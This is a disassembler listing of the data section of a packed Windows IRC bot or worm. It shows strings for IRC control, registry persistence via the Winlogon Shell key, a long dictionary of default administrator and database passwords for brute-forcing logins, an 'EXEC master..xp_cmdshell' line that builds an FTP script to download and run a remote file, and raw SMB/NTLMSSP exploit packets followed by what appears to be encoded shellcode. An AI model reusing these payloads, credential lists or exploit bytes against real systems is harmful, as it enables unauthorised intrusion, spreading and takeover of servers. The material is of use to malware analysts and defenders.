a366 db '366',0 ; DATA XREF: sub_4073C0+6E�o
a332 db '332',0 ; DATA XREF: sub_4073C0+5D�o
a001 db '001',0 ; DATA XREF: sub_4073C0+50�o
aTopic_0 db 'TOPIC',0 ; DATA XREF: sub_4073C0+41�o
align 4
aKick db 'KICK',0 ; DATA XREF: sub_4073C0+2D�o
align 4
aError_0 db 'ERROR',0 ; DATA XREF: sub_4073C0+B�o
align 4
aCCCCCCC db '%c%c%c%c%c%c%c',0 ; DATA XREF: sub_4074A8+B2�o
align 10h
a0123456789abcd db '0123456789abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_4074A8+28�o
align 4
dd 0
aHku db 'HKU',0 ; DATA XREF: UPX0:00407770�o
; UPX0:loc_40784C�o
aHkey_users db 'HKEY_USERS',0 ; DATA XREF: UPX0:0040775F�o
; UPX0:00407845�o
align 10h
aHkcc db 'HKCC',0 ; DATA XREF: UPX0:0040774E�o
; UPX0:loc_407831�o
align 4
aHkey_current_c db 'HKEY_CURRENT_CONFIG',0 ; DATA XREF: UPX0:0040773D�o
; UPX0:0040782A�o
align 10h
aHkcr db 'HKCR',0 ; DATA XREF: UPX0:0040772C�o
; UPX0:loc_407816�o
align 4
aHkey_classes_r db 'HKEY_CLASSES_ROOT',0 ; DATA XREF: UPX0:0040771B�o
; UPX0:0040780F�o
align 10h
aHkcu db 'HKCU',0 ; DATA XREF: UPX0:0040770A�o
; UPX0:loc_4077FB�o
align 4
aHkey_current_u db 'HKEY_CURRENT_USER',0 ; DATA XREF: UPX0:004076F5�o
; UPX0:004077F4�o
align 10h
aHklm db 'HKLM',0 ; DATA XREF: UPX0:004076E0�o
; UPX0:0040785E�o
align 4
aHkey_local_mac db 'HKEY_LOCAL_MACHINE',0 ; DATA XREF: UPX0:004076CB�o
; UPX0:00407857�o
align 10h
aDw db 'DW',0 ; DATA XREF: UPX0:004078E7�o
align 4
aReg_dword db 'REG_DWORD',0 ; DATA XREF: UPX0:004078DB�o
; sub_407924:loc_407955�o
align 10h
aMu db 'MU',0 ; DATA XREF: UPX0:004078CF�o
align 4
aReg_multi_sz db 'REG_MULTI_SZ',0 ; DATA XREF: UPX0:004078C3�o
; sub_407924:loc_407977�o
align 4
aEx db 'EX',0 ; DATA XREF: UPX0:004078B7�o
align 4
aReg_expand_sz db 'REG_EXPAND_SZ',0 ; DATA XREF: UPX0:004078AB�o
; sub_407924:loc_407943�o
align 4
aSz db 'SZ',0 ; DATA XREF: UPX0:0040789F�o
align 4
aReg_sz db 'REG_SZ',0 ; DATA XREF: UPX0:00407893�o
; sub_407924:loc_407949�o
align 4
aReg_dword_big_ db 'REG_DWORD_BIG_ENDIAN',0 ; DATA XREF: sub_407924:loc_407983�o
align 10h
aReg_link db 'REG_LINK',0 ; DATA XREF: sub_407924:loc_40797D�o
align 4
aReg_qword db 'REG_QWORD',0 ; DATA XREF: sub_407924:loc_407971�o
align 4
aUnknown_0 db 'UNKNOWN',0 ; DATA XREF: sub_407924:loc_40796B�o
dd 0
aReg_none db 'REG_NONE',0 ; DATA XREF: sub_407924:loc_40794F�o
align 10h
aReg_binary db 'REG_BINARY',0 ; DATA XREF: sub_407924+19�o
align 10h
a_2dSSS db '(%.2d) %s\%s (%s)',0 ; DATA XREF: sub_407BCA+16F�o
align 8
aDefault db '(Default)',0 ; DATA XREF: sub_407BCA+14D�o
align 4
a_2dSS db '(%.2d) %s\%s',0 ; DATA XREF: sub_407BCA+C4�o
align 4
aSystemShutting db 'System shutting down.',0 ; DATA XREF: sub_40814F+18�o
align 10h
aS_1 db '"%s"',0 ; DATA XREF: sub_40829C+14�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_408812+55�o
align 4
aSNoSTFound_ db '%s No %s t found.',0 ; DATA XREF: sub_408BBE+5B�o
align 10h
dd 0
aSSTStp_DTSStp_ db '%s %s t stp. (%d t(s) stp.)',0 ; DATA XREF: sub_408BBE+32�o
dd 2 dup(0)
aSEnd_ db '%s End.',0 ; DATA XREF: UPX0:00408CDE�o
; UPX0:00408D9A�o
dd 0
aD_S db '%d. %s',0 ; DATA XREF: UPX0:00408CB7�o
; UPX0:00408D71�o
align 4
aSList db '%s List:',0 ; DATA XREF: UPX0:00408C82�o
; UPX0:00408D43�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
; DATA XREF: sub_408EA4+25�o
align 10h
dd 2 dup(0)
aShell db 'Shell',0 ; DATA XREF: sub_408EA4+20�o
align 10h
aOpen db 'Open',0 ; DATA XREF: UPX0:00409571�o
align 4
aNul db ' > nul',0 ; DATA XREF: UPX0:00409540�o
align 10h
aCDel db '/c del ',0 ; DATA XREF: UPX0:00409516�o
dd 0
aComspec db 'COMSPEC',0 ; DATA XREF: UPX0:004094E9�o
align 8
aExplorer_exe db 'Explorer.exe',0 ; DATA XREF: sub_409897+9D�o
align 4
aUnknown db 'unknown',0 ; DATA XREF: sub_409897+49�o
dd 0
off_4116B4 dd offset byte_413980 ; DATA XREF: UPX0:00409B5A�o
; UPX0:loc_409B62�r ...
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aPassword1 ; "password1"
dd offset aPassword ; "password"
dd offset aPasswd ; "passwd"
dd offset aPass1234 ; "pass1234"
dd offset aPass ; "pass"
dd offset aPwd ; "pwd"
dd offset a007 ; "007"
dd offset a1 ; "1"
dd offset a12 ; "12"
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset a1234567 ; "1234567"
dd offset a12345678 ; "12345678"
dd offset a123456789 ; "123456789"
dd offset a1234567890 ; "1234567890"
dd offset a2000 ; "2000"
dd offset a2001 ; "2001"
dd offset a2002 ; "2002"
dd offset a2003 ; "2003"
dd offset a2004 ; "2004"
dd offset aTest ; "test"
dd offset aGuest ; "guest"
dd offset aNone ; "none"
dd offset aDemo ; "demo"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault_0 ; "default"
dd offset aSystem ; "system"
dd offset aServer ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
dd offset aSusan ; "susan"
dd offset aPeter ; "peter"
dd offset aBrian ; "brian"
dd offset aLee ; "lee"
dd offset aNeil ; "neil"
dd offset aIan ; "ian"
dd offset aChris ; "chris"
dd offset aEric ; "eric"
dd offset aGeorge ; "george"
dd offset aKate ; "kate"
dd offset aBob ; "bob"
dd offset aKatie ; "katie"
dd offset aMary ; "mary"
dd offset aLogin ; "login"
dd offset aLoginpass ; "loginpass"
dd offset aTechnical ; "technical"
dd offset aBackup ; "backup"
dd offset aExchange ; "exchange"
dd offset aFuck ; "fuck"
dd offset aBitch ; "bitch"
dd offset aSlut ; "slut"
dd offset aSex ; "sex"
dd offset aGod ; "god"
dd offset aHell ; "hell"
dd offset aHello ; "hello"
dd offset aDomain ; "domain"
dd offset aDomainpass ; "domainpass"
dd offset aDomainpassword ; "domainpassword"
dd offset aDatabase ; "database"
dd offset aAccess ; "access"
dd offset aDbpass ; "dbpass"
dd offset aDbpassword ; "dbpassword"
dd offset aDatabasepass ; "databasepass"
dd offset aData ; "data"
dd offset aDatabasepasswo ; "databasepassword"
dd offset aDb1 ; "db1"
dd offset aDb2 ; "db2"
dd offset aDb1234 ; "db1234"
dd offset aSa ; "sa"
dd offset aSql ; "sql"
dd offset aSqlpassoainsta ; "sqlpassoainstall"
dd offset aOrainstall ; "orainstall"
dd offset aOracle ; "oracle"
dd offset aIbm ; "ibm"
dd offset aCisco ; "cisco"
dd offset aDell ; "dell"
dd offset aCompaq ; "compaq"
dd offset aSiemens ; "siemens"
dd offset aHp ; "hp"
dd offset aNokia ; "nokia"
dd offset dword_4119B4
dd offset aControl ; "control"
dd offset aOffice ; "office"
dd offset aBlank_0 ; "blank"
dd offset aWinpass ; "winpass"
dd offset aMain ; "main"
dd offset aLan ; "lan"
dd offset aInternet ; "internet"
dd offset aIntranet ; "intranet"
dd offset aStudent ; "student"
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 1Dh dup(0)
aStaff db 'staff',0 ; DATA XREF: UPX0:004118DC�o
align 4
aTeacher db 'teacher',0 ; DATA XREF: UPX0:004118D8�o
align 8
aStudent db 'student',0 ; DATA XREF: UPX0:004118D4�o
dd 0
aIntranet db 'intranet',0 ; DATA XREF: UPX0:004118D0�o
align 10h
aLan db 'lan',0 ; DATA XREF: UPX0:004118C8�o
aMain db 'main',0 ; DATA XREF: UPX0:004118C4�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: UPX0:004118C0�o
align 8
aBlank_0 db 'blank',0 ; DATA XREF: UPX0:004118BC�o
align 10h
aOffice db 'office',0 ; DATA XREF: UPX0:004118B8�o
align 4
aControl db 'control',0 ; DATA XREF: UPX0:004118B4�o
dd 0
dword_4119B4 dd 7078h aNokia db 'nokia',0 ; DATA XREF: UPX0:004118AC�o
align 10h
aHp db 'hp',0 ; DATA XREF: UPX0:004118A8�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: UPX0:004118A4�o
align 10h
aCompaq db 'compaq',0 ; DATA XREF: UPX0:004118A0�o
align 4
aDell db 'dell',0 ; DATA XREF: UPX0:0041189C�o
align 10h
aCisco db 'cisco',0 ; DATA XREF: UPX0:00411898�o
align 4
aIbm db 'ibm',0 ; DATA XREF: UPX0:00411894�o
aOracle db 'oracle',0 ; DATA XREF: UPX0:00411890�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: UPX0:0041188C�o
align 10h
dd 0
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: UPX0:00411888�o
align 4
aSql db 'sql',0 ; DATA XREF: UPX0:00411884�o
aSa db 'sa',0 ; DATA XREF: UPX0:00409AE5�o
; UPX0:00411880�o
align 10h
aDb1234 db 'db1234',0 ; DATA XREF: UPX0:0041187C�o
align 4
aDb2 db 'db2',0 ; DATA XREF: UPX0:00411878�o
aDb1 db 'db1',0 ; DATA XREF: UPX0:00411874�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: UPX0:00411870�o
align 4
aData db 'data',0 ; DATA XREF: UPX0:0041186C�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: UPX0:00411868�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: UPX0:00411864�o
align 4
dd 0
aDbpass db 'dbpass',0 ; DATA XREF: UPX0:00411860�o
align 4
aAccess db 'access',0 ; DATA XREF: UPX0:0041185C�o
align 4
aDatabase db 'database',0 ; DATA XREF: UPX0:00411858�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: UPX0:00411854�o
align 4
dd 0
aDomainpass db 'domainpass',0 ; DATA XREF: UPX0:00411850�o
align 4
dd 0
aDomain db 'domain',0 ; DATA XREF: UPX0:0041184C�o
align 4
aHello db 'hello',0 ; DATA XREF: UPX0:00411848�o
align 4
aHell db 'hell',0 ; DATA XREF: UPX0:00411844�o
align 4
aGod db 'god',0 ; DATA XREF: UPX0:00411840�o
aSex db 'sex',0 ; DATA XREF: UPX0:0041183C�o
aSlut db 'slut',0 ; DATA XREF: UPX0:00411838�o
align 4
aBitch db 'bitch',0 ; DATA XREF: UPX0:00411834�o
align 4
aFuck db 'fuck',0 ; DATA XREF: UPX0:00411830�o
align 4
aExchange db 'exchange',0 ; DATA XREF: UPX0:0041182C�o
align 10h
aBackup db 'backup',0 ; DATA XREF: UPX0:00411828�o
align 4
aTechnical db 'technical',0 ; DATA XREF: UPX0:00411824�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: UPX0:00411820�o
align 10h
aLogin db 'login',0 ; DATA XREF: UPX0:0041181C�o
align 4
aMary db 'mary',0 ; DATA XREF: UPX0:00411818�o
align 10h
aKatie db 'katie',0 ; DATA XREF: UPX0:00411814�o
align 4
aKate db 'kate',0 ; DATA XREF: UPX0:0041180C�o
align 10h
aGeorge db 'george',0 ; DATA XREF: UPX0:00411808�o
align 4
aEric db 'eric',0 ; DATA XREF: UPX0:00411804�o
align 10h
aChris db 'chris',0 ; DATA XREF: UPX0:00411800�o
align 4
aIan db 'ian',0 ; DATA XREF: UPX0:004117FC�o
aNeil db 'neil',0 ; DATA XREF: UPX0:004117F8�o
align 4
aLee db 'lee',0 ; DATA XREF: UPX0:004117F4�o
aBrian db 'brian',0 ; DATA XREF: UPX0:004117F0�o
align 10h
aSusan db 'susan',0 ; DATA XREF: UPX0:004117E8�o
align 4
aSue db 'sue',0 ; DATA XREF: UPX0:004117E4�o
aSam db 'sam',0 ; DATA XREF: UPX0:004117E0�o
aLuke db 'luke',0 ; DATA XREF: UPX0:004117DC�o
align 4
aPeter db 'peter',0 ; DATA XREF: UPX0:004117D8�o
; UPX0:004117EC�o
align 10h
aJohn db 'john',0 ; DATA XREF: UPX0:004117D4�o
align 4
aMike db 'mike',0 ; DATA XREF: UPX0:004117D0�o
align 10h
aBill db 'bill',0 ; DATA XREF: UPX0:004117CC�o
align 4
aFred db 'fred',0 ; DATA XREF: UPX0:004117C8�o
align 10h
aJoe db 'joe',0 ; DATA XREF: UPX0:004117C4�o
aJen db 'jen',0 ; DATA XREF: UPX0:004117C0�o
aBob db 'bob',0 ; DATA XREF: UPX0:004117BC�o
; UPX0:00411810�o
aQwe db 'qwe',0 ; DATA XREF: UPX0:004117B8�o
aZxc db 'zxc',0 ; DATA XREF: UPX0:004117B4�o
aAsd db 'asd',0 ; DATA XREF: UPX0:004117B0�o
aQaz db 'qaz',0 ; DATA XREF: UPX0:004117AC�o
aWin2000 db 'win2000',0 ; DATA XREF: UPX0:004117A8�o
align 8
aWinnt db 'winnt',0 ; DATA XREF: UPX0:004117A4�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: UPX0:004117A0�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: UPX0:0041179C�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: UPX0:00411798�o
align 4
aWindows db 'windows',0 ; DATA XREF: UPX0:00411794�o
dd 0
aOeminstall db 'oeminstall',0 ; DATA XREF: UPX0:00411790�o
align 10h
dd 0
aOemuser db 'oemuser',0 ; DATA XREF: UPX0:0041178C�o
align 10h
aOem db 'oem',0 ; DATA XREF: UPX0:00411788�o
aUser db 'user',0 ; DATA XREF: UPX0:00411784�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: UPX0:00411780�o
align 4
aHome db 'home',0 ; DATA XREF: UPX0:0041177C�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: UPX0:00411778�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: UPX0:00411774�o
align 4
aInternet db 'internet',0 ; DATA XREF: UPX0:00411770�o
; UPX0:004118CC�o
align 4
aWww db 'www',0 ; DATA XREF: UPX0:0041176C�o
aWeb db 'web',0 ; DATA XREF: UPX0:00411768�o
aOutlook db 'outlook',0 ; DATA XREF: UPX0:00411764�o
dd 0
aMail db 'mail',0 ; DATA XREF: UPX0:00411760�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: UPX0:0041175C�o
align 4
aNull db 'null',0 ; DATA XREF: UPX0:00411758�o
align 4
aRoot db 'root',0 ; DATA XREF: UPX0:00409AF0�o
; UPX0:00411754�o
align 4
aServer db 'server',0 ; DATA XREF: UPX0:00411750�o
align 4
aSystem db 'system',0 ; DATA XREF: UPX0:0041174C�o
align 4
aDefault_0 db 'default',0 ; DATA XREF: UPX0:00411748�o
align 8
aChangeme db 'changeme',0 ; DATA XREF: UPX0:00411744�o
align 4
aLinux db 'linux',0 ; DATA XREF: UPX0:00411740�o
align 4
aUnix db 'unix',0 ; DATA XREF: UPX0:0041173C�o
align 4
aDemo db 'demo',0 ; DATA XREF: UPX0:00411738�o
align 4
aNone db 'none',0 ; DATA XREF: UPX0:00411734�o
align 4
aGuest db 'guest',0 ; DATA XREF: UPX0:00411730�o
align 4
aTest db 'test',0 ; DATA XREF: UPX0:0041172C�o
align 4
a2004 db '2004',0 ; DATA XREF: UPX0:00411728�o
align 4
a2003 db '2003',0 ; DATA XREF: UPX0:00411724�o
align 4
a2002 db '2002',0 ; DATA XREF: UPX0:00411720�o
align 4
a2001 db '2001',0 ; DATA XREF: UPX0:0041171C�o
align 4
a2000 db '2000',0 ; DATA XREF: UPX0:00411718�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: UPX0:00411714�o
align 4
dd 0
a123456789 db '123456789',0 ; DATA XREF: UPX0:00411710�o
align 4
a12345678 db '12345678',0 ; DATA XREF: UPX0:0041170C�o
align 4
a1234567 db '1234567',0 ; DATA XREF: UPX0:00411708�o
align 10h
a123456 db '123456',0 ; DATA XREF: UPX0:00411704�o
align 4
a12345 db '12345',0 ; DATA XREF: UPX0:00411700�o
align 10h
a1234 db '1234',0 ; DATA XREF: UPX0:004116FC�o
align 4
a123 db '123',0 ; DATA XREF: UPX0:004116F8�o
a12 db '12',0 ; DATA XREF: UPX0:004116F4�o
align 10h
a1: ; DATA XREF: UPX0:004116F0�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: UPX0:004116EC�o
aPwd db 'pwd',0 ; DATA XREF: UPX0:004116E8�o
aPass db 'pass',0 ; DATA XREF: UPX0:004116E4�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: UPX0:004116E0�o
align 10h
aPasswd db 'passwd',0 ; DATA XREF: UPX0:004116DC�o
align 4
aPassword db 'password',0 ; DATA XREF: UPX0:004116D8�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: UPX0:004116D4�o
align 10h
aAdm db 'adm',0 ; DATA XREF: UPX0:004116D0�o
aAdmin db 'admin',0 ; DATA XREF: UPX0:00409AF7�o
; UPX0:004116CC�o
align 4
aAdmins db 'admins',0 ; DATA XREF: UPX0:004116C8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: UPX0:004116C4�o
dd 0
aAdministrateur db 'administrateur',0 ; DATA XREF: UPX0:004116C0�o
align 8
aAdministrador db 'administrador',0 ; DATA XREF: UPX0:004116BC�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: UPX0:004116B8�o
align 4
aExploitingSDSS db 'exploiting (%s):%d, %s/%s',0 ; DATA XREF: UPX0:00409CAA�o
align 8
aBlank db '(Blank)',0 ; DATA XREF: UPX0:00409C8F�o
dd 0
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'del z&echo open %s %s >> z&echo user'
; DATA XREF: UPX0:00409C23�o
db ' %s %s >> z &echo get %s >> z &echo quit >> z &ftp -n -s:z &%s&de'
db 'l z',0Dh,0Ah
db 27h,0
align 4
dd 6 dup(0)
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: UPX0:00409B90�o
align 10h
aB db '',0
dw 4400h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedcaca db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 0
dword_411F4C dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_409D61+85�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_411FD8 dd 0B9000000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_409D61+BE�o
dd 0C0750000h, 6DD70000h, 0FF0Ch, 2FFDF00h, 100h, 5B000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Eh, 0, 60h
db 59h ; Y
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Fh, 30h
db 4Dh ; M
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 3Bh, 4
a9ntlmssp db '9NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 10h, 0, 10h
db 0
db 29h, 2 dup(0)
db 0
aWorkgrouplqpxf db 'WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195',0
aWindows20005_0 db 'Windows 2000 5.0',0
align 4
dword_412098 dd 0D010000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_409D61+10E�o
dd 0C0750000h
dword_4120B8 dd 6DD72000h, 0FF0Ch, 2FFDF00h, 100h, 0AF000000h, 0
; DATA XREF: sub_409D61+FB�o
dd 0D05C00h, 0A100D280h, 8130AC81h, 0A681A2A9h, 4EA38104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 20000000h, 82002000h, 0
dd 0A2000000h, 1000000h, 0ED000802h, 778839B7h, 0BE16D7h
dd 3 dup(0)
db 0
db 2 dup(0), 42h
db 0AEh ; ®
db 0B7h, 1Fh, 0BBh
db 6Dh ; m
db 0C1h, 84h, 99h
db 1
aKXEcTijW db 'k',8,'±xºeC',0Ah
db 'ÓšâI†)W',0
aO db 'O',0
aR db 'R',0
dd offset byte_47004B
db 52h, 0, 4Fh
db 0
db 55h, 0, 50h
db 0
db 6Ch, 0, 51h
db 0
db 50h, 0, 78h
db 0
db 66h, 0, 32h
db 0
db 49h, 0, 53h
db 0
db 51h, 0, 67h
db 0
db 45h, 0, 56h
db 0
db 31h, 0, 62h
db 0
db 47h, 0, 4Bh
db 0
align 2
aWindows2000219 db 'Windows 2000 2195',0
aWindows20005_1 db 'Windows 2000 5.0',0
align 4
dword_4121AC dd 6B000000h, 424D53FFh, 73h, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+13F�o
dd 0C0750000h, 6DD70000h, 0FF0Dh, 2FFDF00h, 100h, 2 dup(0)
dd 40000000h, 2E000000h, 4F570000h, 52474B52h, 50554Fh
aWindows20002_0 db 'Windows 2000 2195',0
aWindows20005_2 db 'Windows 2000 5.0',0
align 4
dword_41221C dd 37000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+18C�o
dd 0C0750000h
dword_41223C dd 6DD72001h, 0FF04h, 1000000h, 0C00h, 24435049h, 3F3F3F00h
; DATA XREF: sub_409D61+17C�o
dd 3F3Fh
dword_412258 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_409D61+266�o
dword_412274 dd 4780800h dword_412278 dd 400800h, 0DE00FF18h, 1000DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dword_4122C4 dd 3F020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+2E3�o
dword_4122E0 dd 4780800h dword_4122E4 dd 400800h, 0FF0Eh db 0
byte_4122ED db 0, 40h, 0 ; DATA XREF: sub_409D61+2D0�o
dd 0FF000000h, 8FFFFFFh, 20000h, 3F020000h, 0
dd 5020000h, 10030B00h, 0
dd 2, 0D0000000h, 16D016h, 0B000000h, 0
dd 84000100h, 1FB33323h, 2C0E9508h, 0C32C304Ah, 1830708h
dd 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 1000000h, 0BE000100h, 54A71E0Eh, 91E02161h, 23E45A04h
dd 2D082E6h, 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 2000000h, 0E9000100h, 0E77F4FDFh, 0A54D6B2Bh
dd 833CAAD4h, 0A10315h, 4000200h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 3000000h, 0AD000100h, 19D89A50h
dd 1CF35CB9h, 0AD534199h, 175601Eh, 4000000h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 4000000h, 97000100h
dd 409F7E21h, 0D7BEC99Eh, 0F1B0A4EBh, 595FE37h, 4000300h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 5000000h
dd 0FD000100h, 858B52C8h, 8B3A74CCh, 30E02915h, 216ACCDh
dd 4000100h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 6000000h, 5B000100h, 0E19ACBDEh, 1F728325h, 92A2A310h
dd 7636E7h, 4000200h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 7000000h, 74000100h, 9C0CDF4h, 0BEF37F2Dh
dd 0C3573B8h, 1685206h, 4000000h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 8000000h, 0E5000100h, 0E1EA256Ch
dd 4AC21B8Ah, 29885617h, 106C3EEh, 4000200h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 9000000h, 26000100h
dd 4D7D7050h, 7BAF8288h, 0EA1D963Dh, 29A17EBh, 4000100h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 0A000000h
dd 0C8000100h, 704B324Fh, 1201D316h, 0BF475A78h, 388E16Eh
dd 4000000h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 0
dword_412508 dd 3B000000h, 424D53FFh, 2Eh, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+354�o
dword_412524 dd 4780800h dword_412528 dd 400800h, 0FF0Ah db 0
byte_412531 db 0, 40h, 0 ; DATA XREF: sub_409D61+344�o
dd 80000000h, 0FFBB80BBh, 0FFFFFFh, 2 dup(0)
dword_412548 dd 0FB020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+60A�o
dword_412564 dd 4780800h dword_412568 dd 400800h, 0FF0Eh db 0
byte_412571 db 0, 40h, 0 ; DATA XREF: sub_409D61+3B5�o
dd 0FF000000h, 8FFFFFFh, 2BC00h, 3F02BC00h, 0
dd 502BC00h, 10030000h, 0BC000000h, 2, 0A4000000h, 0A000002h
dd 79001F00h, 3941FA0h, 0
dd 3000000h, 59000000h, 4C00h, 31000000h, 1, 31000000h
dd 5C000001h, 6E554600h, 76454C4Dh, 6A7A4E64h, 7A58746Eh
dd 6376416Eh, 7644534Fh, 556C5563h, 4A464C4Ch, 4350436Dh
dd 65676A6Dh, 44627058h, 74414943h, 5254446Ah, 79784150h
dd 58744958h, 78446643h, 58526A76h, 79535774h, 63714341h
dd 577A7250h, 55616548h, 6F72664Bh, 75456E68h, 555A7953h
dd 627A507Ah, 42A94365h, 15D53846h, 0A89B2567h, 3F9747B9h
dd 37B92B1h, 56696FCh, 91B68D04h, 0FD30B49Fh, 4A411D2Ch
dd 3448B3B0h, 4E4FF9B8h
db 0F5h
byte_412659 db 31h, 0C9h, 83h ; DATA XREF: sub_409D61+4AC�o
dd 0FFE8ADE9h, 0C0FFFFFFh, 0E76815Eh, 9794BB22h, 0E2FCEE83h
dd 0C07FA3F4h, 1544DD65h, 6B44D273h, 7FD1DE68h, 6B42CADAh
dd 1FDBDD68h, 1F9F06FBh, 0E8301ED2h, 7BBA5A92h, 1FA36D1Ch
dd 7FBA02C8h, 1F8FA9DEh, 548ACC96h, 543F8E0Eh, 5E7A25E3h
dd 7F79239Ah, 0B0EF1963h, 1F5E57BFh, 7FBA06C8h, 0DFB7A9F1h
dd 95A77D1Ch, 1F97217Ch, 889F4E1Eh, 4F8AE1F6h, 0A4F8A9F3h
dd 1FB7621Ch, 1F163EE7h, 0FCE52AD7h, 78B56C19h, 0F26DDDC7h
dd 0A7D344C4h, 0E7CC4AA5h, 6BEF7DA5h, 79704A47h, 6BEB196Bh
dd 71327D41h, 9C56A3F1h, 96D17795h, 4DD3F268h, 0C316D79Eh
dd 0C7E8F468h, 0D7E871C4h, 6BE861C4h, 85D34447h, 1DE844CBh
dd 30D3B776h, 0C37C528Dh, 84D1F468h, 444477C6h, 0BA1686FFh
dd 4244757Eh, 444477C4h, 12F2C7FFh, 424475DEh, 0C1EF76C7h
dd 0FC28F268h, 0ED7D5B70h, 0C16DDDC0h, 0FEDDF268h, 0F7D344F3h
